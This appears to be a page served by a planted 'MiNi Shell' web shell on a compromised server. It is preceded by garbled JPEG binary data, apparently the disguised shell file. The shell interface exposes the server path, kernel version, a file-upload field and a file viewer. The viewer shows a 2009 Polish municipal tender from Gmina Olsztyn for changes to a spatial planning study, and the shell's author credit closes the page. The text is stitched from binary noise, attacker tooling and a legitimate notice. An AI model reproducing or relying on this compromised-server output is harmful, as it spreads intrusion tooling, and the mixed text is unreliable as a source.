JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090716/113717-N-2009.html

<p class="kh_header"><b>Olsztyn: Opracowanie zmiany studium 
uwarunkowań i kierunków zagospodarowania przestrzennego
Gminy Olsztyn</b><br>
<b>Numer ogłoszenia: 113717 - 2009; data zamieszczenia: 16.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Olsztyn , Plac Piłsudskiego 10, 42-256 Olsztyn, woj. śląskie, tel. 034 3285077, faks 023 3285057.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olsztyn.ug.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie zmiany studium 
uwarunkowań i kierunków zagospodarowania przestrzennego
Gminy Olsztyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Olsztyn     Zakres prac obejmuje m.in. : 
1)	Sporządzenie zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Olsztyn w jej administracyjnych granicach na podstawie Uchwały Nr XLIII/304/06 Rady Gminy Olsztyn z dnia 26.10.2006 r. w sprawie przystąpienia do zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Olsztyn;  przedmiotem zmiany studium jest zmiana w strukturze przestrzennej Gminy oraz zmiana kierunków przeznaczenia terenu, dotyczących w szczególności:
a)	stanu dziedzictwa kulturowego i zabytków,
b)	stanu prawnego gruntów,
c)	występowania obiektów i terenów chronionych na podstawie przepisów odrębnych
d)	stanu systemów komunikacji,
e)	terenu tzw. Pocztowce.
2)	Sporządzenie prognoz oddziaływania na środowisko, spełniających wymagania wynikające z ustawy z dnia 3 października 2008 r. o udostępnianiu informacji 
o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz 
o ocenach oddziaływania na środowisko;
Szczegółowe wymagania dotyczące przedmiotu zamówienia:
1)	Projekt zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Olsztyn musi spełniać wymogi art. 10 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 poz. 717 z późn. zm.) oraz Rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. Nr 118, poz. 1233).
2)	Wymaga się aby część graficzna zmiany studium sporządzona została w postaci analogowej w skali 1:2000 - w wersji roboczej oraz skali 1:10 000 - w wersji do uchwalenia.  
3)	Opracowanie zmiany studium należy wykonać w ilości po 5 egzemplarzy w formie papierowej i elektronicznej. Przed przekazaniem wersji elektronicznej opracowania zmiany studium Wykonawca zobowiązany jest do uzgodnienia z Zamawiającym formatów i wydruku. 
2.3. Zaleca się dokonanie wizji lokalnej strefy administracyjnej Gminy Olsztyn w celu  zdobycia wszelkich danych i informacji niezbędnych do należytego wykonania zamówienia i prawidłowego obliczenia ceny ofertowej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2, 71.40.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 8.1. Wysokość wadium.
Każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  2 000,00 zł (dwa tysiące złotych). 
8.2. Forma wadium.
Wadium może być wniesione w następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
Z treści gwarancji winno wynikać bezwarunkowe na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania z ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust 4a, oraz art. 46 ust. 5 ustawy Prawo Zamówień Publicznych
8.3. Miejsce i sposób wniesienia wadium.
Wadium wnoszone w pieniądzu należy wpłacić na konto Zamawiającego: PKO BP II Oddział w Częstochowie nr 05 1020 1664 0000 3902 0028 4620 
Do oferty należy dołączyć kopię polecenia przelewu.
Wadium wnoszone w innych dopuszczalnych formach należy złożyć w oryginale w siedzibie Zamawiającego, w pokoju nr 16, a do oferty dołączyć kopię dokumentu potwierdzoną za zgodność z oryginałem przez wykonawcę. 
8.4. Termin wniesienia wadium.
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym ale nie wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.
8.5. Zwrot wadium.
Zamawiający zwróci wadium według zasad określonych w art. 46 ust. 1 - 4 pzp.                     z zastrzeżeniem ust. 4a pzp.
Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 , lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
8.6. Utrata wadium.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 6.1. O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki z art. 22 ust. 1 pzp, tj.: 
6.1.1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
6.1.2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym, a także osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia; 
6.1.3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
6.1.4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
6.2. Dodatkowe wymagania od wykonawców:
6.2.1.	W zespole projektowym powinni zatrudnić co najmniej dwie osoby posiadające prawo do wykonywania zawodu urbanisty na podstawie obowiązujących przepisów, w tym: 
6.2.1.1.	 W zespole projektowym powinni zatrudnić co najmniej jedną osobę posiadającą prawo do wykonywania zawodu urbanisty na podstawie obowiązujących przepisów, która  zostanie  wyznaczona do kierowania zespołem projektowym pełniącą funkcję głównego projektanta. Główny projektant powinien legitymować się co najmniej 10 letnim doświadczeniem wykonywaniu planów zagospodarowania  przestrzennego oraz posiadać w swoim dorobku  co najmniej wykonane 3 studia uwarunkowań i kierunków zagospodarowania przestrzennego opracowane dla obszarów całych gmin oraz 7 planów  zagospodarowania przestrzennego przy opracowaniu, których pełnił funkcję głównego projektanta. 
Powyższy punkt 6.2.1.1. powinien wynikać z załączonego pisemnego     zobowiązaniem tej osoby do pełnienia obowiązków głównego projektanta - załącznik nr 5 do SIWZ , wykazu wykonanych prac (według załącznika nr 6 do SIWZ, co powinno być potwierdzone dokumentami, że prace te zostały należycie wykonane) oraz wykazu posiadanych kwalifikacji zawodowych (według załącznika nr 7 do SIWZ, powinno być potwierdzone dokumentami zatrudnieniowymi z miejsca pracy).
6.2.1.2.	 W zespole projektowym powinni zatrudnić co najmniej jedną osobę posiadającą prawo do wykonywania zawodu urbanisty na podstawie obowiązujących przepisów, która legitymuje się co najmniej 5 letnim doświadczeniem w wykonywaniu zawodu. 
Powyższy punkt 6.2.1.2. powinien wynikać z informacji o posiadanym doświadczeniu zawodowym  (według załącznika nr 8 do SIWZ, co powinno być potwierdzone dokumentami zatrudnieniowymi z miejsca pracy).
Powyższe punkty 6.2.1.1 oraz 6.2.1.2 powinny wynikać z załączonego wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia zgodnie z załącznikiem nr 4 do SIWZ.
 
6.2.2.	Posiadają w swym dorobku co najmniej dwa wykonane w ostatnich pięciu latach studia uwarunkowań i kierunków zagospodarowania przestrzennego  dla całego (a nie wybranych fragmentów) obszaru gminy w jej administracyjnych granicach, z których przynajmniej jedno opracowanie zostało sporządzone dla gminy miejskiej, bądź wiejsko-miejskiej, uchwalone przez radę miasta/gminy, których  sporządzenie  nie było zakwestionowane przez wojewodę. Przez wykonanie studium uwarunkowań i kierunków zagospodarowania przestrzennego w ostatnich pięciu latach należy rozumieć zamówienie, którego czas realizacji w całości mieści się w tym okresie.  
Powyższy punkt 6.2.3. powinien wynikać z załączonego wykazu wykonanych prac według załącznika nr 3 do SIWZ oraz powinno to być potwierdzone dokumentami, że prace te zostały należycie wykonane.
6.3. Ocena spełniania warunków udziału w postępowaniu będzie prowadzona na zasadzie spełnia/nie spełnia, na podstawie treści złożonych oświadczeń i dokumentów.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 7.1. W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawcy    obowiązani są załączyć do oferty następujące oświadczenia i dokumenty: 
7.1.1.	Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pzp, oraz o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 i 2 pzp,
7.1.2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
7.1.3.	Zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
7.1.4.	Wykaz zrealizowanych zadań z zakresu planowania przestrzennego w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością z zakres robót stanowiącym przedmiot zamówienia, z podaniem ich wartości,  daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie,
7.1.7. Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz pisemnym   zobowiązani osoby, o której mowa w pkt. 6.2.1.1.  do pełnienia obowiązków głównego projektanta,
7.1.8. Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu niniejszego zamówienia, posiadają wymagane uprawnienia, tj. ważne uprawnienia do zmiany studium uwarunkowań i kierunków zagospodarowania,  które zostały wydane na podstawie wcześniej obowiązujących przepisów i aktualne dokumenty stwierdzające przynależność do odpowiedniej izby samorządu zawodowego, oraz posiadają odpowiednie kwalifikacje zawodowe. 
7.1.9. Wykaz zrealizowanych przez głównego projektanta zadań z zakresu planowania przestrzennego w okresie ostatnich dziesięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, odpowiadających swoim rodzajem i wartością z zakres robót stanowiącym przedmiot zamówienia, z podaniem ich wartości,  daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie,
7.2. Wykonawcy, którzy mają siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa powyżej w pkt 7.1.2 - 7.1.5 składają odpowiednie dokumenty określone w §2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzaju dokumentów jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane       (Dz. U. Nr 87 poz. 605 ze zm.)
7.3. Wymagane dokumenty należy przedstawić w formie oryginału lub kserokopii. Dokumenty złożone w formie kserokopii muszą być opatrzone klauzulą za zgodność z oryginałem i poświadczone przez osoby uprawnione do reprezentowania firmy. Poświadczenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu (np. z imienną pieczątką). W przypadku poświadczenia za zgodność z oryginałem dokumentów przez osoby(ę) nie wymienione(ą) w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo dla osoby podpisującej.  
7.4. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości. 
7.5. Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.olsztyn.bip.jur.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Olsztyn, Pl. Piłsudskiego 10 42-256 Olsztyn pok. nr 16.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2009 godzina 10:00, miejsce: Urząd Gminy Olsztyn, Pl. Piłsudskiego 10 42-256 Olsztyn pok. nr 16.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com